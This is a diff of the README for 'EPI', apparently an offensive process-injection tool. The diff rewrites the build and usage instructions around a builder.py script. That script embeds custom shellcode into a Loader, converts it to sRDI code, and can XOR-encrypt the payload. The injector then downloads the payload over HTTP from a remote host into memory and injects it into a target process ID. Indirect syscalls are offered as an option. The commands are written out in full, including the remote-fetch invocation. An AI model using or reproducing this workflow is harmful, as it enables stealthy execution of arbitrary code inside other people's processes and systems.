Kudaes/EPI/README.md

 ## No Loader - Custom payload

-If you just want to directly execute your custom shellcode without using the Loader, you have to replace the value of the `bytes` variable (`EPI::src::main.rs:13`) with the hexadecimal content of your payload.
-Then, compile the project and run the tool:
+If you just want to directly execute your custom shellcode without using the Loader (which is *highly unrecommended*), just run `builder.py` with the flag `-p` indicating the full path of your payload file.
+Then, just run `epi.exe`:

-	C:\Users\User\Desktop\EPI\EPI> cargo build --release
+	C:\Users\User\Desktop\EPI> python3 builder.py -p c:\path\to\payload.bin
 	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -h

+In case you dont want to embed the payload in the resulting binary, you can encrypt it (simple xor encryption) using the `-d` flag and then download it directly into the injector's process memory using HTTP:

+	C:\Users\User\Desktop\EPI> python3 builder.py -p c:\path\to\payload.bin -d

+The resulting encrypted payload will be written to the `payload` directory.
+The encryption key will be the same value used for the `LITCRYPT_ENCRYPT_KEY` environment variable.
+You have to pass this value to `epi.exe` to be able to decrypt the payload in runtime:

+	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -p <PID> -u http://remoteip/payload.bin -k setarandomkeyeachtime [flags]

 Be aware that, depending on the behaviour of your shellcode, you might end up hijacking the thread and potentially causing a process crash.
+Also, take into account that no cleanup will be performed when injecting this way, leading to all kind of unexpected process behaviours.

 ## Loader & Custom payload

 This is my recommended choice, since it allows you to fully customize the execution in the most reliable way.
 This is the right option if you want to run a different payload than the one provided and use the functionality of the Loader to avoid the crash of the target process.

-First, you have to replace the value of the `bytes` variable in the Loader (`Loader::src::lib.rs:14`) with the hexadecimal content of your payload.
-Then, compile the project as usual:

-	C:\Users\User\Desktop\EPI\Loader> cargo build --release

-Then, use the provided Python script `ConvertToShellcode.py` to convert the generated `loader.dll` into sRDI.
-I've obtained this script from the fantastic [sRDI](https://github.com/monoxgas/sRDI/tree/master) project after fixing some [issues](https://github.com/monoxgas/sRDI/pull/32) that were generating multi-hour long delays.

-	C:\Users\User\Desktop\EPI\sRDI> python3 ConvertToShellcode.py -f run ..\Loader\target\release\loader.dll

-This execution should generate a `loader.bin` file.
-Again, get its hex content and use it to replace the value of the `bytes` variable in the EPI project (`EPI::src::main.rs:13`).
-Finally, compile EPI and run the tool:

-	C:\Users\User\Desktop\EPI\EPI> cargo build --release
+Also, the Loader is responsible for performing the cleanup and restoring the modified structures to their previous state.

+To build the tool, run `builder.py` with the `-l` flag to indicate the use of the Loader.
+In case you want to enable the use of indirect syscalls in the Loader, you can do so by passing the `-i` flag.

+	C:\Users\User\Desktop\EPI> python3 builder.py -l -p c:\path\to\payload.bin [-i]

+This execution will embed your payload in the Loader, compile the Loader, convert it into sRDI and embed the final PIC code in EPI.
+Once the builder ends its execution, the injector is ready to be used:

+	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -p <PID> [flags]

+Again, if you don't want to embed the final PIC code in the resulting binary, you can encrypt it (simple xor encryption) passing the `-d` flag to the builder and then download it directly into the injector's process memory using HTTP:

+	C:\Users\User\Desktop\EPI> python3 builder.py -l -p c:\path\to\payload.bin -d [-i]

+The resulting encrypted payload will be written to the `payload` directory.
+The encryption key will be the same value used for the `LITCRYPT_ENCRYPT_KEY` environment variable.
+This value has to be passed to `epi.exe` to be able to decrypt the payload in runtime:

-	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -h
+	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -p <PID> -u http://remoteip/payload.bin -k setarandomkeyeachtime [flags]

 # Usage